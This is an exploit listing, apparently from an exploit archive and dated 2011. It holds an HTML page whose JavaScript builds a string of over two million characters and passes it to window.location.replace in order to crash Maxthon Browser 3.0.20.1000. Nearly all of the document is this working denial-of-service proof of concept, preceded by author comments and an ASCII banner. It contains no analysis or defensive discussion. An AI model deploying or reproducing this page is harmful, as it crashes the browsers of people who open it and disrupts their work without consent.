Maxthon Browser version 3.0.20.1000 .ref .replace denial of service exploit.
2693f4ba663debe1d537dcf67c943a47f668f740cfe8102e537404fc3481ba3e
<html>
<head>
# Exploit Title: Maxthon Browser v3.0.20.1000 .ref .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: https://dl.maxthon.com/mx3/mx3.0.20.3000.exe
# Version: v3.0.20.1000
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
# mail----> shogilord^gmail.com spams are welcome!!!!!
# ________ _ _________ ____ __ _____ ________
# / ____/ / | | / / ____/ | / / //_// _/ | / / ____/
# / __/ / / | | / / __/ / |/ / ,< / // |/ / / __
# / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
# COLOMBIA hacking presents.............
#
# MAxthon Check the .replace and .ref ;)
#
<script type="text/javascript">
function mul(str,count){
if(count==0) return '';
var binaryCount = count.toString(2);
var numDegree = binaryCount.length;
var resultStr='';
for(var i=0; i<numDegree; i++){
resultStr+=resultStr;
if(binaryCount.charAt(i) == '1'){
resultStr+=str;
}
}
return resultStr;
}
var junka = "a";
var junk = mul(junka,2304453);
//window.location.href = "https://" + junk;
window.location.replace("https://" + junk);
</script>
</head>
<body>
</body>
</html>